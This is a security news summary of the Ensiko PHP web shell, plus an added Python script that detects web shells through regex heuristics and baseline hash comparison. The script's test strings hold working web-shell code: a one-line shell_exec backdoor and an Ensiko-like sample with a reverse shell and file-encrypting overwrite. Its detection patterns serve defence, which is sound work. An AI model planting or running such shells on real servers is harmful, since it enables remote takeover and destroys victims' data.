Not quite ransomware: Ensiko is a PHP web shell that also carries file-encryption, ransomware-like capabilities.
What’s going on?
The malware is a threat to any system that runs PHP, whether on Windows, Linux, or macOS. Threat actors can use it to remotely control a compromised server and carry out further malicious activity from it.
- Ensiko can execute shell commands on the compromised system and return the output to its operators, including through a PHP reverse shell.
- It can also scan servers for other web shells, deface websites, disclose sensitive information, send mass emails, and download remote files, among other things.
Noteworthy technical details
- The web shell can be password-protected, so only operators who know the password can use it.
- The file-encryption component is what gives Ensiko its ransomware-like capability and can be turned against the servers it lands on.
- According to Trend Micro's researchers, the malware uses PHP's RIJNDAEL_128 cipher in CBC mode to encrypt the files in the web shell's directory.
- Another function recursively overwrites every file with a specified extension in the web shell's directory.
- Other capabilities of the malware can be found in the blog post by Trend Micro researchers.
The bottom line is that the use of web shell malware to compromise computer networks has increased. Internet-facing systems are not the only targets: web shells are frequently deployed on non-Internet-facing web servers, such as network device management interfaces or internal content management systems. Moreover, web shells are difficult to identify because operators can easily modify them, so several detection methods should be combined to discover such malware on a system.
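As an added example that is not code from this page, from Trend Micro, or from Ensiko itself, the Python script below shows two of the complementary detection methods the last paragraph calls for: a heuristic scan of PHP sources for the capability categories listed above (command execution, reverse shell, password gate, Rijndael-128/CBC encryption via the legacy mcrypt extension, recursive overwrite), and a SHA-256 baseline comparison that limits the scan to files that appeared or changed since a known-good snapshot. The indicator regexes, the PHP samples (including the Ensiko-like one, which is modelled on the capabilities the article describes and is not Ensiko's source), and the file trees are all constructed for illustration.

```python
"""Web shell triage: heuristic PHP source scan plus baseline comparison.

Added example, not code from Trend Micro or from Ensiko. All indicator
patterns, PHP samples and file trees below are constructed for illustration.
"""
import hashlib
import re

# Heuristic indicator categories. None is a signature for a specific family;
# operators rename and re-obfuscate shells easily, so this is a triage aid.
INDICATORS = {
    "command_exec": re.compile(
        r"\b(system|shell_exec|passthru|exec|popen|proc_open)\s*\(", re.I),
    "eval_like": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "obfuscation": re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # Request parameter used directly as a function name: $_GET['f']($arg)
    "request_as_callable": re.compile(
        r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    # Socket opened and a shell attached to it: reverse shell pattern.
    "reverse_shell": re.compile(
        r"\bfsockopen\s*\(.*?(/bin/(ba)?sh|cmd\.exe)", re.I | re.S),
    # Hash of a request parameter compared against a constant: password gate.
    "password_gate": re.compile(
        r"\b(md5|sha1|crypt)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
    # Legacy mcrypt Rijndael-128 in CBC mode, as reported for Ensiko.
    "mcrypt_rijndael_cbc": re.compile(
        r"mcrypt_(en|de)crypt\s*\(\s*MCRYPT_RIJNDAEL_128\b.*?MCRYPT_MODE_CBC",
        re.I | re.S),
    # Recursive directory walk combined with in-place file writes.
    "recursive_overwrite": re.compile(
        r"(?=.*RecursiveDirectoryIterator)(?=.*\bfile_put_contents\s*\()", re.S),
}


def scan_php(source):
    """Return indicator hits, score and verdict for one PHP source string."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    score = len(hits)
    verdict = "likely web shell" if score >= 2 else "review" if score else "clean"
    return {"hits": hits, "score": score, "verdict": verdict}


def fingerprint(files):
    """Map path -> SHA-256 of content for a {path: source} tree."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in files.items()}


def diff_against_baseline(baseline, current):
    """Files added, removed or modified relative to a known-good snapshot."""
    base, cur = fingerprint(baseline), fingerprint(current)
    return {
        "added": sorted(p for p in cur if p not in base),
        "removed": sorted(p for p in base if p not in cur),
        "modified": sorted(p for p in cur if p in base and cur[p] != base[p]),
    }


def triage(baseline, current):
    """Scan only files that changed since the baseline; return path -> result."""
    delta = diff_against_baseline(baseline, current)
    return {p: scan_php(current[p]) for p in delta["added"] + delta["modified"]}


# --- constructed samples: not real site code and not Ensiko's source --------
BENIGN = """<?php
$title = htmlspecialchars($_GET['title'] ?? 'Home');
echo "<h1>$title</h1>";
"""

# A benign page with a one-line backdoor appended to it.
ONE_LINER_SHELL = BENIGN + """
if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }
"""

# Modelled on the capabilities the article lists: password gate, command
# execution, reverse shell, Rijndael-128/CBC encryption, recursive overwrite.
ENSIKO_LIKE = """<?php
if (md5($_POST['pass']) !== '<md5-of-operator-password>') { die(); }
if ($_GET['a'] === 'exec') { passthru($_GET['c']); }
if ($_GET['a'] === 'rev') {
    $s = fsockopen($_GET['h'], (int)$_GET['p']);
    proc_open('/bin/sh -i', [0 => $s, 1 => $s, 2 => $s], $pipes);
}
if ($_GET['a'] === 'enc') {
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(__DIR__));
    foreach ($it as $f) {
        if (!$f->isFile()) { continue; }
        $ct = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, file_get_contents($f),
                             MCRYPT_MODE_CBC, $iv);
        file_put_contents($f, $ct);
    }
}
"""

UTIL = "<?php function add($a, $b) { return $a + $b; }\n"
BASELINE_TREE = {"index.php": BENIGN, "lib/util.php": UTIL}
CURRENT_TREE = {"index.php": ONE_LINER_SHELL, "lib/util.php": UTIL,
                "uploads/cache.php": ENSIKO_LIKE}

if __name__ == "__main__":
    for path, result in triage(BASELINE_TREE, CURRENT_TREE).items():
        print(f"{path}: {result['verdict']} {result['hits']}")
```

Run against the constructed trees, the untouched `lib/util.php` is never scanned, the appended one-liner in `index.php` surfaces as "review" on a single command-execution hit, and the Ensiko-like upload scores five categories. The content heuristics are deliberately coarse and are easy to evade by renaming or encoding, which is exactly the point the paragraph above makes; the baseline diff catches a modified or newly dropped file regardless of what it contains, so the two methods cover each other's blind spots. One caveat on the mcrypt indicator: it only fires on code that still calls the legacy mcrypt extension (deprecated in PHP 7.1 and moved out of core in 7.2), so a shell ported to `openssl_encrypt` would need a separate pattern.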